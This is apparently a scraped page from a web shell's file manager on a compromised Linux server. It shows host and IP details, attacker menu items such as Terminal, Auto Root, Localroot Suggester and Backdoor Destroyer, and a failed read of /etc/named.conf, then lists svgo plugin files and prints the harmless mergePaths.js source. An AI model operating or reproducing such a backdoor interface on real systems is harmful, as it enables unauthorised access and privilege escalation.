Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.147.67.34
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
node_modules /
svgo /
plugins /
Delete
Unzip
Name
Size
Permission
Date
Action
_collections.js
56.33
KB
-rw-r--r--
2016-12-25 15:17
_path.js
29.8
KB
-rw-r--r--
2017-01-29 15:46
_transforms.js
9.9
KB
-rw-r--r--
2016-08-20 17:44
addAttributesToSVGElement.js
1.34
KB
-rw-r--r--
2016-08-25 19:35
addClassesToSVGElement.js
1.58
KB
-rw-r--r--
2016-08-25 19:56
cleanupAttrs.js
1.28
KB
-rw-r--r--
2016-08-20 17:44
cleanupEnableBackground.js
2.25
KB
-rw-r--r--
2016-08-20 17:44
cleanupIDs.js
5.42
KB
-rw-r--r--
2016-11-21 19:50
cleanupListOfValues.js
3.45
KB
-rw-r--r--
2016-08-20 17:44
cleanupNumericValues.js
2.01
KB
-rw-r--r--
2016-08-20 17:44
collapseGroups.js
2.76
KB
-rw-r--r--
2016-12-25 15:17
convertColors.js
3.47
KB
-rw-r--r--
2016-12-25 15:17
convertPathData.js
29.66
KB
-rw-r--r--
2017-01-29 15:46
convertShapeToPath.js
2.82
KB
-rw-r--r--
2016-08-20 17:44
convertStyleToAttrs.js
3.93
KB
-rw-r--r--
2016-08-20 17:44
convertTransform.js
10.65
KB
-rw-r--r--
2016-08-20 17:44
mergePaths.js
2.01
KB
-rw-r--r--
2016-08-20 17:44
minifyStyles.js
1.19
KB
-rw-r--r--
2016-08-20 17:44
moveElemsAttrsToGroup.js
3.31
KB
-rw-r--r--
2016-08-20 17:44
moveGroupAttrsToElems.js
1.81
KB
-rw-r--r--
2016-08-20 17:44
removeAttrs.js
2.49
KB
-rw-r--r--
2016-08-20 17:44
removeComments.js
508
B
-rw-r--r--
2016-08-20 17:44
removeDesc.js
785
B
-rw-r--r--
2016-08-20 17:44
removeDimensions.js
662
B
-rw-r--r--
2016-08-20 17:44
removeDoctype.js
1.01
KB
-rw-r--r--
2016-08-20 17:44
removeEditorsNSData.js
1.51
KB
-rw-r--r--
2016-08-20 17:44
removeElementsByAttr.js
1.89
KB
-rw-r--r--
2016-08-20 17:44
removeEmptyAttrs.js
509
B
-rw-r--r--
2016-08-20 17:44
removeEmptyContainers.js
690
B
-rw-r--r--
2016-08-20 17:44
removeEmptyText.js
1.1
KB
-rw-r--r--
2016-08-20 17:44
removeHiddenElems.js
6.23
KB
-rw-r--r--
2016-08-20 17:44
removeMetadata.js
392
B
-rw-r--r--
2016-08-20 17:44
removeNonInheritableGroupAttrs.js
1.08
KB
-rw-r--r--
2016-11-20 10:56
removeRasterImages.js
558
B
-rw-r--r--
2016-08-20 17:44
removeStyleElement.js
426
B
-rw-r--r--
2016-08-20 17:44
removeTitle.js
497
B
-rw-r--r--
2016-08-20 17:44
removeUnknownsAndDefaults.js
4.48
KB
-rw-r--r--
2016-12-25 15:17
removeUnusedNS.js
2.33
KB
-rw-r--r--
2016-08-20 17:44
removeUselessDefs.js
1.01
KB
-rw-r--r--
2016-08-24 19:21
removeUselessStrokeAndFill.js
2.37
KB
-rw-r--r--
2016-08-20 17:44
removeViewBox.js
1.15
KB
-rw-r--r--
2016-08-20 17:44
removeXMLNS.js
591
B
-rw-r--r--
2016-08-25 19:56
removeXMLProcInst.js
487
B
-rw-r--r--
2016-08-20 17:44
sortAttrs.js
1.5
KB
-rw-r--r--
2016-08-25 19:35
transformsWithOnePath.js
10.57
KB
-rw-r--r--
2016-08-20 17:44
Save
Rename
'use strict'; exports.type = 'perItem'; exports.active = true; exports.description = 'merges multiple paths in one if possible'; exports.params = { collapseRepeated: true, leadingZero: true, negativeExtraSpace: true }; var path2js = require('./_path.js').path2js, js2path = require('./_path.js').js2path, intersects = require('./_path.js').intersects; /** * Merge multiple Paths into one. * * @param {Object} item current iteration item * @return {Boolean} if false, item will be filtered out * * @author Kir Belevich, Lev Solntsev */ exports.fn = function(item, params) { if (!item.isElem() || item.isEmpty()) return; var prevContentItem = null, prevContentItemKeys = null; item.content = item.content.filter(function(contentItem) { if (prevContentItem && prevContentItem.isElem('path') && prevContentItem.isEmpty() && prevContentItem.hasAttr('d') && contentItem.isElem('path') && contentItem.isEmpty() && contentItem.hasAttr('d') ) { if (!prevContentItemKeys) { prevContentItemKeys = Object.keys(prevContentItem.attrs); } var contentItemAttrs = Object.keys(contentItem.attrs), equalData = prevContentItemKeys.length == contentItemAttrs.length && contentItemAttrs.every(function(key) { return key == 'd' || prevContentItem.hasAttr(key) && prevContentItem.attr(key).value == contentItem.attr(key).value; }), prevPathJS = path2js(prevContentItem), curPathJS = path2js(contentItem); if (equalData && !intersects(prevPathJS, curPathJS)) { js2path(prevContentItem, prevPathJS.concat(curPathJS), params); return false; } } prevContentItem = contentItem; prevContentItemKeys = null; return true; }); };